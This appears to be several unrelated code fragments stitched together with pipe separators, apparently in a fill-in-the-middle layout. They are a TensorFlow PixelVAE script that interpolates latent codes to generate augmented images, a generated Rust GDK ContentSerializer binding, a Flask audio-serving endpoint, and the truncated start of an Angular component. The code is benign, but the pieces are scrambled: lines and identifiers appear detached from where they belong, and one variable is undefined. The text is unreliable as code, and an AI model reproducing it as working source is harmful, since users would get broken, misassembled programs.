masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_0, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS, output_dim=DIM_0, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
if EMBED_INPUTS:
masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('Dec1.Pix1', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=5, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
# Make the variance of output and masked_images (roughly) match
output /= 2
# Warning! Because of the masked convolutions it's very important that masked_images comes first in this concat
output = tf.concat([masked_images, output], axis=1)
if WIDTH == 64:
output = ResidualBlock('Dec1.Pix2Res', input_dim=2*DIM_0, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('Dec1.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('Dec1.Pix4Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
else:
output = ResidualBlock('Dec1.Pix2Res', input_dim=2*DIM_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('Dec1.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_PIX_1, output_dim=256*N_CHANNELS, filter_size=1, mask_type=('b', N_CHANNELS), he_init=False, inputs=output)
else:
if WIDTH == 64:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_0, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_1, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
return tf.transpose(
tf.reshape(output, [-1, 256, N_CHANNELS, HEIGHT, WIDTH]),
[0,2,3,4,1]
)
def Enc2(h1):
output = h1
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Enc2.Res0', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1Pre', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1Pre2', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Pre', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Pre2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Pre3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res1A', input_dim=DIM_3, output_dim=DIM_4, filter_size=3, resample='down', he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2PreA', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Enc2.Res2Post', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = tf.reshape(output, [-1, 4*4*DIM_4])
output = lib.ops.linear.Linear('Enc2.Output', input_dim=4*4*DIM_4, output_dim=2*LATENT_DIM_2, inputs=output)
return output
def Dec2(latents, targets):
output = tf.clip_by_value(latents, -50., 50.) |
output = tf.reshape(output, [-1, DIM_4, 4, 4])
output = ResidualBlock('Dec2.Res1Pre', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res1', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res1Post', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3', input_dim=DIM_4, output_dim=DIM_3, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Dec2.Res3Post5', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post6', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post7', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('Dec2.Res3Post8', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
if HIGHER_LEVEL_PIXCNN:
if LATENTS1_WIDTH == 16:
masked_targets = lib.ops.conv2d.Conv2D('Dec2.Pix1', input_dim=LATENT_DIM_1, output_dim=DIM_2, filter_size=5, mask_type=('a', PIX_2_N_BLOCKS), he_init=False, inputs=targets)
else:
masked_targets = lib.ops.conv2d.Conv2D('Dec2.Pix1', input_dim=LATENT_DIM_1, output_dim=DIM_3, filter_size=5, mask_type=('a', PIX_2_N_BLOCKS), he_init=False, inputs=targets)
# Make the variance of output and masked_targets roughly match
output /= 2
output = tf.concat([masked_targets, output], axis=1)
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Dec2.Pix2Res', input_dim=2*DIM_2, output_dim=DIM_PIX_2, filter_size=3, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
else:
output = ResidualBlock('Dec2.Pix2Res', input_dim=2*DIM_3, output_dim=DIM_PIX_2, filter_size=3, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
output = ResidualBlock('Dec2.Pix3Res', input_dim=DIM_PIX_2, output_dim=DIM_PIX_2, filter_size=3, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
output = ResidualBlock('Dec2.Pix4Res', input_dim=DIM_PIX_2, output_dim=DIM_PIX_2, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=True, inputs=output)
output = lib.ops.conv2d.Conv2D('Dec2.Out', input_dim=DIM_PIX_2, output_dim=2*LATENT_DIM_1, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=False, inputs=output)
else:
if LATENTS1_WIDTH == 16:
output = lib.ops.conv2d.Conv2D('Dec2.Out', input_dim=DIM_2, output_dim=2*LATENT_DIM_1, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec2.Out', input_dim=DIM_3, output_dim=2*LATENT_DIM_1, filter_size=1, mask_type=('b', PIX_2_N_BLOCKS), he_init=False, inputs=output)
return output
# Only for 32px_cifar, 64px_big_onelevel, and MNIST. Needs modification for others.
def EncFull(images):
output = images
if WIDTH == 32: #64
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_0, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS, output_dim=DIM_0, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('EncFull.Res1', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res2', input_dim=DIM_0, output_dim=DIM_1, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res3', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res4', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res5', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res6', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res7', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res8', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res9', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res10', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res11', input_dim=DIM_3, output_dim=DIM_4, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res12', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res13', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, inputs=output)
output = tf.reshape(output, [-1, 2*2*DIM_4])
output = lib.ops.linear.Linear('EncFull.Output', input_dim=2*2*DIM_4, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
else:
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('EncFull.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('EncFull.Res1', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res2', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res3', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res4', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('EncFull.Res5', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('EncFull.Res6', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = tf.reduce_mean(output, reduction_indices=[2,3])
output = lib.ops.linear.Linear('EncFull.Output', input_dim=DIM_3, output_dim=2*LATENT_DIM_2, initialization='glorot', inputs=output)
return output
# Only for 32px_CIFAR, 64px_big_onelevel and MNIST. Needs modification for others.
def DecFull(latents, images):
output = tf.clip_by_value(latents, -50., 50.)
if WIDTH == 32: # 64:LEILAEDIT. Also changed 4*4 to 2*2 and 4,4 to 2,2 in the two lines below
output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=2*2*DIM_4, initialization='glorot', inputs=output)
output = tf.reshape(output, [-1, DIM_4, 2, 2])
output = ResidualBlock('DecFull.Res2', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res3', input_dim=DIM_4, output_dim=DIM_4, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res4', input_dim=DIM_4, output_dim=DIM_3, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res5', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res6', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res7', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res8', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res9', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res10', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res11', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res12', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res13', input_dim=DIM_1, output_dim=DIM_0, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res14', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, he_init=True, inputs=output)
else:
output = lib.ops.linear.Linear('DecFull.Input', input_dim=LATENT_DIM_2, output_dim=DIM_3, initialization='glorot', inputs=output)
output = tf.reshape(tf.tile(tf.reshape(output, [-1, DIM_3, 1]), [1, 1, 49]), [-1, DIM_3, 7, 7])
output = ResidualBlock('DecFull.Res2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res4', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res5', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res6', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', he_init=True, inputs=output)
output = ResidualBlock('DecFull.Res7', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, he_init=True, inputs=output)
if WIDTH == 32: #64:
dim = DIM_0
else:
dim = DIM_1
if PIXEL_LEVEL_PIXCNN:
if EMBED_INPUTS:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS*DIM_EMBED, output_dim=dim, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
else:
masked_images = lib.ops.conv2d.Conv2D('DecFull.Pix1', input_dim=N_CHANNELS, output_dim=dim, filter_size=3, inputs=images, mask_type=('a', N_CHANNELS), he_init=False)
# Warning! Because of the masked convolutions it's very important that masked_images comes first in this concat
output = tf.concat([masked_images, output], axis=1)
output = ResidualBlock('DecFull.Pix2Res', input_dim=2*dim, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('DecFull.Pix3Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = ResidualBlock('DecFull.Pix4Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
if WIDTH != 32: #64: LEILAEDIT
output = ResidualBlock('DecFull.Pix5Res', input_dim=DIM_PIX_1, output_dim=DIM_PIX_1, filter_size=3, mask_type=('b', N_CHANNELS), inputs=output)
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=DIM_PIX_1, output_dim=256*N_CHANNELS, filter_size=1, mask_type=('b', N_CHANNELS), he_init=False, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Out', input_dim=dim, output_dim=256*N_CHANNELS, filter_size=1, he_init=False, inputs=output)
return tf.transpose(
tf.reshape(output, [-1, 256, N_CHANNELS, HEIGHT, WIDTH]),
[0,2,3,4,1]
)
def split(mu_and_logsig):
mu, logsig = tf.split(mu_and_logsig, 2, axis=1)
sig = 0.5 * (tf.nn.softsign(logsig)+1)
logsig = tf.log(sig)
return mu, logsig, sig
def clamp_logsig_and_sig(logsig, sig):
# Early during training (see BETA_ITERS), stop sigma from going too low
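    # The floor decays linearly from 1 at iteration 0 to 0 at BETA_ITERS, after which no clamping is applied.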
floor = 1. - tf.minimum(1., tf.cast(total_iters, 'float32') / BETA_ITERS)
log_floor = tf.log(floor)
return tf.maximum(logsig, log_floor), tf.maximum(sig, floor)
scaled_images = (tf.cast(images, 'float32') - 128.) / 64.
if EMBED_INPUTS:
embedded_images = lib.ops.embedding.Embedding('Embedding', 256, DIM_EMBED, images)
embedded_images = tf.transpose(embedded_images, [0,4,1,2,3])
embedded_images = tf.reshape(embedded_images, [-1, DIM_EMBED*N_CHANNELS, HEIGHT, WIDTH])
if MODE == 'one_level':
# Layer 1
if EMBED_INPUTS:
mu_and_logsig1 = EncFull(embedded_images)
else:
mu_and_logsig1 = EncFull(scaled_images)
mu1, logsig1, sig1 = split(mu_and_logsig1)
eps = tf.random_normal(tf.shape(mu1))
latents1 = mu1 # LEILAEDIT
if EMBED_INPUTS:
outputs1 = DecFull(latents1, embedded_images)
else:
outputs1 = DecFull(latents1, scaled_images)
reconst_cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=tf.reshape(outputs1, [-1, 256]),
labels=tf.reshape(images, [-1])
)
)
# Assembly
# An alpha of exactly 0 can sometimes cause inf/nan values, so we're
# careful to avoid it.
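    # alpha ramps linearly from ~1/ALPHA1_ITERS up to 1 over ALPHA1_ITERS iterations and is then held constant, scaled by KL_PENALTY.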
alpha = tf.minimum(1., tf.cast(total_iters+1, 'float32') / ALPHA1_ITERS) * KL_PENALTY
kl_cost_1 = tf.reduce_mean(
lib.ops.kl_unit_gaussian.kl_unit_gaussian(
mu1,
logsig1,
sig1
)
)
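    # Rescale the KL term by the ratio of latent to output dimensions so it is weighted comparably to the per-pixel reconstruction cost.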
kl_cost_1 *= float(LATENT_DIM_2) / (N_CHANNELS * WIDTH * HEIGHT)
cost = reconst_cost + (alpha * kl_cost_1)
elif MODE == 'two_level':
# Layer 1
if EMBED_INPUTS:
mu_and_logsig1, h1 = Enc1(embedded_images)
else:
mu_and_logsig1, h1 = Enc1(scaled_images)
mu1, logsig1, sig1 = split(mu_and_logsig1)
if mu1.get_shape().as_list()[2] != LATENTS1_HEIGHT:
raise Exception("LATENTS1_HEIGHT doesn't match mu1 shape!")
if mu1.get_shape().as_list()[3] != LATENTS1_WIDTH:
raise Exception("LATENTS1_WIDTH doesn't match mu1 shape!")
eps = tf.random_normal(tf.shape(mu1))
latents1 = mu1 + (eps * sig1)
if EMBED_INPUTS:
outputs1 = Dec1(latents1, embedded_images)
outputs1_sample = Dec1(latents1_sample, embedded_images)
else:
outputs1 = Dec1(latents1, scaled_images)
outputs1_sample = Dec1(latents1_sample, scaled_images)
reconst_cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=tf.reshape(outputs1, [-1, 256]),
labels=tf.reshape(images, [-1])
)
)
# Layer 2
mu_and_logsig2 = Enc2(h1)
mu2, logsig2, sig2 = split(mu_and_logsig2)
eps = tf.random_normal(tf.shape(mu2))
latents2 = mu2 + (eps * sig2)
outputs2 = Dec2(latents2, latents1)
mu1_prior, logsig1_prior, sig1_prior = split(outputs2)
logsig1_prior, sig1_prior = clamp_logsig_and_sig(logsig1_prior, sig1_prior)
mu1_prior = 2. * tf.nn.softsign(mu1_prior / 2.)
# Assembly
# An alpha of exactly 0 can sometimes cause inf/nan values, so we're
# careful to avoid it.
alpha1 = tf.minimum(1., tf.cast(total_iters+1, 'float32') / ALPHA1_ITERS) * KL_PENALTY
    alpha2 = tf.minimum(1., tf.cast(total_iters+1, 'float32') / ALPHA2_ITERS) * alpha1  # * KL_PENALTY
kl_cost_1 = tf.reduce_mean(
lib.ops.kl_gaussian_gaussian.kl_gaussian_gaussian(
mu1,
logsig1,
sig1,
mu1_prior,
logsig1_prior,
sig1_prior
)
)
kl_cost_2 = tf.reduce_mean(
lib.ops.kl_unit_gaussian.kl_unit_gaussian(
mu2,
logsig2,
sig2
)
)
kl_cost_1 *= float(LATENT_DIM_1 * LATENTS1_WIDTH * LATENTS1_HEIGHT) / (N_CHANNELS * WIDTH * HEIGHT)
kl_cost_2 *= float(LATENT_DIM_2) / (N_CHANNELS * WIDTH * HEIGHT)
cost = reconst_cost + (alpha1 * kl_cost_1) + (alpha2 * kl_cost_2)
tower_cost.append(cost)
if MODE == 'two_level':
tower_outputs1_sample.append(outputs1_sample)
full_cost = tf.reduce_mean(
tf.concat([tf.expand_dims(x, 0) for x in tower_cost], axis=0), 0
)
if MODE == 'two_level':
full_outputs1_sample = tf.concat(tower_outputs1_sample, axis=0)
# Sampling
if MODE == 'one_level':
ch_sym = tf.placeholder(tf.int32, shape=None)
y_sym = tf.placeholder(tf.int32, shape=None)
x_sym = tf.placeholder(tf.int32, shape=None)
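    # Slice out the 256-way logits for a single (channel, y, x) position and draw one categorical sample from them.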
logits = tf.reshape(tf.slice(outputs1, tf.stack([0, ch_sym, y_sym, x_sym, 0]), tf.stack([-1, 1, 1, 1, -1])), [-1, 256])
dec1_fn_out = tf.multinomial(logits, 1)[:, 0]
def dec1_fn(_latents, _targets, _ch, _y, _x):
return session.run(dec1_fn_out, feed_dict={latents1: _latents, images: _targets, ch_sym: _ch, y_sym: _y, x_sym: _x, total_iters: 99999, bn_is_training: False, bn_stats_iter:0})
def enc_fn(_images):
return session.run(latents1, feed_dict={images: _images, total_iters: 99999, bn_is_training: False, bn_stats_iter:0})
sample_fn_latents1 = np.random.normal(size=(1, LATENT_DIM_2)).astype('float32')
def generate_and_save_samples(tag):
from keras.utils import np_utils
    x_augmentation_set = np.zeros((1, N_CHANNELS, HEIGHT, WIDTH)) #LEILAEDIT: to enable .npy image saving
    y_augmentation_set = np.zeros((1, 1, NUM_CLASSES)) #LEILAEDIT: to enable .npy image saving.
# Function to translate numeric images into plots
def color_grid_vis(X, nh, nw, save_path):
# from github.com/Newmu
X = X.transpose(0,2,3,1)
h, w = X[0].shape[:2]
img = np.zeros((h*nh, w*nw, 3))
for n, x in enumerate(X):
            j = n // nw
            i = n % nw
img[j*h:j*h+h, i*w:i*w+w, :] = x
imsave(OUT_DIR + '/' + save_path, img)
numsamples = 1125
#pvals = np.linspace(0.2, 0.8, num=4)
#pvals = np.linspace(0.2, 0.8, num=1)
x_train_set_array = np.array(x_train_set)
y_train_set_array = np.array(y_train_set)
for imagenum in range(numsamples):
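        # Draw a single mixing coefficient from Beta(0.2, 0.2); this U-shaped distribution keeps most mixes close to one of the two source images.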
pvals = np.random.beta(0.2, 0.2, 1)
imageindices = random.sample(range(x_train_set.shape[0]),2)
imageindex1 = imageindices[0]
imageindex2 = imageindices[1]
# Draw the corresponding images and labels from the training data
image1 = x_train_set[imageindex1,:]
image2 = x_train_set[imageindex2,:]
label1 = y_train_set[imageindex1,:]
label2 = y_train_set[imageindex2,:]
# Reshape
image1 = image1.reshape(1, N_CHANNELS, HEIGHT, WIDTH)
image2 = image2.reshape(1, N_CHANNELS, HEIGHT, WIDTH)
label1 = label1.reshape(1, 1)
label2 = label2.reshape(1, 1)
# Save the original images
#print "Saving original samples"
#color_grid_vis(
# image1,
# 1,
# 1,
# 'original_1_classes{}and{}_num{}.png'.format(label1,label2,imagenum)
#)
#color_grid_vis(
# image2,
# 1,
# 1,
# 'original_2_classes{}and{}_num{}.png'.format(label1,label2,imagenum)
#)
# Encode the images
image_code1 = enc_fn(image1)
image_code2 = enc_fn(image2)
# Change labels to matrix form before performing interpolations
label1 = np_utils.to_categorical(label1, NUM_CLASSES)
label2 = np_utils.to_categorical(label2, NUM_CLASSES)
# Combine the latent codes
for p in pvals:
new_code = np.multiply(p,image_code1) + np.multiply((1-p),image_code2)
new_label = np.multiply(p,label1) + np.multiply((1-p),label2)
new_label = new_label.reshape(1,1,NUM_CLASSES)
samples = np.zeros(
(1, N_CHANNELS, HEIGHT, WIDTH),
dtype='int32')
            print("Generating samples")
            for y in range(HEIGHT):
                for x in range(WIDTH):
                    for ch in range(N_CHANNELS):
next_sample = dec1_fn(new_code, samples, ch, y, x)
samples[:,ch,y,x] = next_sample
x_augmentation_set = np.concatenate((x_augmentation_set, samples), axis=0)#LEILAEDIT for .npy saving
y_augmentation_set = np.concatenate((y_augmentation_set, new_label), axis=0)#LEILAEDIT for .npy saving
color_grid_vis(
samples,
1,
1,
'interpolation1_classes{}and{}_pval{}_num{}.png'.format(label1,label2,p,imagenum)
)
x_augmentation_array = np.delete(x_augmentation_set, (0), axis=0)
y_augmentation_array = np.delete(y_augmentation_set, (0), axis=0)
x_augmentation_array = x_augmentation_array.astype(np.uint8)
np.save(OUT_DIR + '/' + 'x_augmentation_array_mean_beta_largesample', x_augmentation_array) #LEILAEDIT for .npy saving
np.save(OUT_DIR + '/' + 'y_augmentation_array_mean_beta_largesample', y_augmentation_array) #LEILAEDIT for .npy saving
# Run
if MODE == 'one_level':
prints=[
('alpha', alpha),
('reconst', reconst_cost),
('kl1', kl_cost_1)
]
decayed_lr = tf.train.exponential_decay(
LR,
total_iters,
LR_DECAY_AFTER,
LR_DECAY_FACTOR,
staircase=True
)
    lib.sampling_loop_cifar_filter_3.sampling_loop( #LEILAEDIT. TODO: update to remove unnecessary arguments
session=session,
inputs=[total_iters, all_images],
inject_iteration=True,
bn_vars=(bn_is_training, bn_stats_iter),
cost=full_cost,
stop_after=TIMES['stop_after'],
prints=prints,
optimizer=tf.train.AdamOptimizer(decayed_lr),
train_data=train_data,
test_data=dev_data,
callback=generate_and_save_samples,
callback_every=TIMES['callback_every'],
test_every=TIMES['test_every'],
save_checkpoints=True
) | output = lib.ops.linear.Linear('Dec2.Input', input_dim=LATENT_DIM_2, output_dim=4*4*DIM_4, inputs=output) |
content_serializer.rs | // This file was generated by gir (https://github.com/gtk-rs/gir)
// from gir-files (https://github.com/gtk-rs/gir-files.git)
// DO NOT EDIT
use glib::translate::*;
use std::fmt;
glib::wrapper! {
pub struct ContentSerializer(Object<ffi::GdkContentSerializer>);
match fn {
type_ => || ffi::gdk_content_serializer_get_type(),
}
}
impl ContentSerializer {
#[doc(alias = "gdk_content_serializer_get_cancellable")]
#[doc(alias = "get_cancellable")]
pub fn | (&self) -> Option<gio::Cancellable> {
unsafe {
from_glib_none(ffi::gdk_content_serializer_get_cancellable(
self.to_glib_none().0,
))
}
}
#[doc(alias = "gdk_content_serializer_get_gtype")]
#[doc(alias = "get_gtype")]
pub fn type_(&self) -> glib::types::Type {
unsafe { from_glib(ffi::gdk_content_serializer_get_gtype(self.to_glib_none().0)) }
}
#[doc(alias = "gdk_content_serializer_get_mime_type")]
#[doc(alias = "get_mime_type")]
pub fn mime_type(&self) -> glib::GString {
unsafe {
from_glib_none(ffi::gdk_content_serializer_get_mime_type(
self.to_glib_none().0,
))
}
}
#[doc(alias = "gdk_content_serializer_get_output_stream")]
#[doc(alias = "get_output_stream")]
pub fn output_stream(&self) -> gio::OutputStream {
unsafe {
from_glib_none(ffi::gdk_content_serializer_get_output_stream(
self.to_glib_none().0,
))
}
}
#[doc(alias = "gdk_content_serializer_get_value")]
#[doc(alias = "get_value")]
pub fn value(&self) -> glib::Value {
unsafe { from_glib_none(ffi::gdk_content_serializer_get_value(self.to_glib_none().0)) }
}
#[doc(alias = "gdk_content_serializer_return_success")]
pub fn return_success(&self) {
unsafe {
ffi::gdk_content_serializer_return_success(self.to_glib_none().0);
}
}
}
impl fmt::Display for ContentSerializer {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.write_str("ContentSerializer")
}
}
| cancellable |
VoiceManagerApi.py | from flask import send_file
from python_helper import Constant as c
from python_helper import EnvironmentHelper, log
from python_framework import ResourceManager, FlaskUtil, HttpStatus, LogConstant
from queue_manager_api import QueueManager
import ModelAssociation
app = ResourceManager.initialize(__name__, ModelAssociation.MODEL, managerList=[
QueueManager()
])
@app.route(f'{app.api.baseUrl}/audios/<string:key>')
def getAudio(key=None): | return send_file(
path,
mimetype="audio/mp3",
as_attachment=False
), HttpStatus.OK
except Exception as exception:
MESSAGE_KEY = 'message'
responseDto = {MESSAGE_KEY: 'Audio not found'}
log.error(getAudio, responseDto.get(MESSAGE_KEY), exception=exception)
return responseDto, 404 | log.info(getAudio, f'{LogConstant.CONTROLLER_SPACE}{FlaskUtil.safellyGetVerb()}{c.SPACE_DASH_SPACE}{FlaskUtil.safellyGetUrl()}')
try:
dto = app.api.resource.service.speak.findAudioByKey(key)
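        # Rebuild the on-disk location of the audio file from the dto's path, name and extension before streaming it back.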
path = f'''{dto.path.split(f'src{EnvironmentHelper.OS_SEPARATOR}')[-1]}{EnvironmentHelper.OS_SEPARATOR}{dto.name}{c.DOT}{dto.extension}''' |
crisis-list.component.ts | import { Observable } from 'rxjs';
import { switchMap } from 'rxjs/operators';
import { Component, OnInit } from '@angular/core';
import { ActivatedRoute } from '@angular/router';
import { CrisisService } from '../crisis.service';
import { Crisis } from '../crisis';
@Component({
selector: 'app-crisis-list',
templateUrl: './crisis-list.component.html',
styleUrls: ['./crisis-list.component.css']
})
export class | implements OnInit {
crisis$: Observable<Crisis[]>;
selectedId: number;
constructor(
private service: CrisisService,
private route: ActivatedRoute
) {}
ngOnInit() {
